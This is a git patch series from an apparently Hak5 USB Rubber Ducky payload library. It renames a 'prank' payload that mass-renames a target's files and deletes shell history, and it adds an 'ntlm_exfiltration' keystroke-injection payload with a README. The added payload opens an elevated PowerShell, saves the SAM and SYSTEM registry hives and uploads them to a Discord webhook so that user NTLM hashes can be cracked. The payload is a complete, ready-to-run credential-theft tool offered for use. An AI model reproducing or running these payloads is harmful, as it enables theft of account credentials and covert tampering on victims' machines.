a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Same_File_Name_Prank/payload.txt similarity index 89% rename from payloads/library/prank/Rename_Everything_Similarly/payload.txt rename to payloads/library/prank/Same_File_Name_Prank/payload.txt index 5a2c70e..d5b6b7f 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt +++ b/payloads/library/prank/Same_File_Name_Prank/payload.txt @@ -1,13 +1,13 @@ REM_BLOCK -################################################# -# # -# Title : Rename Everything Similarly # -# Author : Aleff # -# Version : 1.0 # -# Category : Prank # -# Target : Windows 10/11; GNU/Linux # -# # -################################################# +############################################# +# # +# Title : Same File Name Prank # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11; GNU/Linux # +# # +############################################# END_REM REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. @@ -31,12 +31,15 @@ REM_BLOCK END_REM DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . -REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. -DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE +REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system. +REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system. +DEFINE #TARGET_WINDOWS TRUE +DEFINE #TARGET_GNU_LINUX FALSE REM %%%%% PAYLOAD-SECTION %%%%% -IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE +IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN +REM %%%%% WINDOWS CODE %%%%% REM_BLOCK Credits: Hak5 LLC @@ -132,7 +135,8 @@ IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE $counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit END_STRINGLN -ELSE_DEFINED +ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN +REM %%%%% GNU/LINUX CODE %%%%% REM_BLOCK Credits: Hak5 LLC @@ -215,4 +219,4 @@ ELSE_DEFINED counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit END_STRINGLN -END_IF_DEFINED +END_IF \ No newline at end of file From 15f8f25701bacc1816c1f942268517cf2d14f22b Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:18:39 +0200 Subject: [PATCH 12/15] Create payload.txt --- .../ntlm_exfiltration/payload.txt | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/payload.txt diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt new file mode 100644 index 0000000..ee2b9d6 --- /dev/null +++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt @@ -0,0 +1,34 @@ +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: luu176 + + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF +END_EXTENSION + +DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE +GUI d +DELAY 1000 +GUI r +DELAY 1000 +STRINGLN powershell Start-Process powershell -Verb runAs +DELAY 3000 +LEFTARROW +ENTER +DELAY 3000 +STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close() +DELAY 500 +GUI d From c898ed7858a76b584333672f2873b219d9f17a56 Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:20:06 +0200 Subject: [PATCH 13/15] Create README.md --- .../exfiltration/ntlm_exfiltration/README.md | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/README.md diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md new file mode 100644 index 0000000..acba0c3 --- /dev/null +++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md @@ -0,0 +1,28 @@ +# Exfiltrate NTLM Hash - Windows ✅ + +A script used to exfiltrate the NTLM hash on a Windows machine. + +## Description + +A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. + +### Settings + +* Set the Discord webhook URL +* Ensure the webhook permissions are configured + +## Credits + +

Luu176

+
+ + + + +
+ + + +
Github +
+
From a81ecd3e6494b7a443e57bec4afa449bed7d8661 Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:21:49 +0200 Subject: [PATCH 14/15] Update payload.txt --- payloads/library/exfiltration/ntlm_exfiltration/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt index ee2b9d6..7204ad5 100644 --- a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt +++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt @@ -1,6 +1,6 @@ EXTENSION PASSIVE_WINDOWS_DETECT REM VERSION 1.1 - REM AUTHOR: luu176 + REM AUTHOR: Korben DEFINE #MAX_WAIT 150 DEFINE #CHECK_INTERVAL 20 From 0df301160179eee71ee464e53a9f31e0584952eb Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:23:30 +0200 Subject: [PATCH 15/15] Update README.md --- payloads/library/exfiltration/ntlm_exfiltration/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md index acba0c3..4e31910 100644 --- a/payloads/library/exfiltration/ntlm_exfiltration/README.md +++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md @@ -4,7 +4,7 @@ A script used to exfiltrate the NTLM hash on a Windows machine. ## Description -A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. +A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users. ### Settings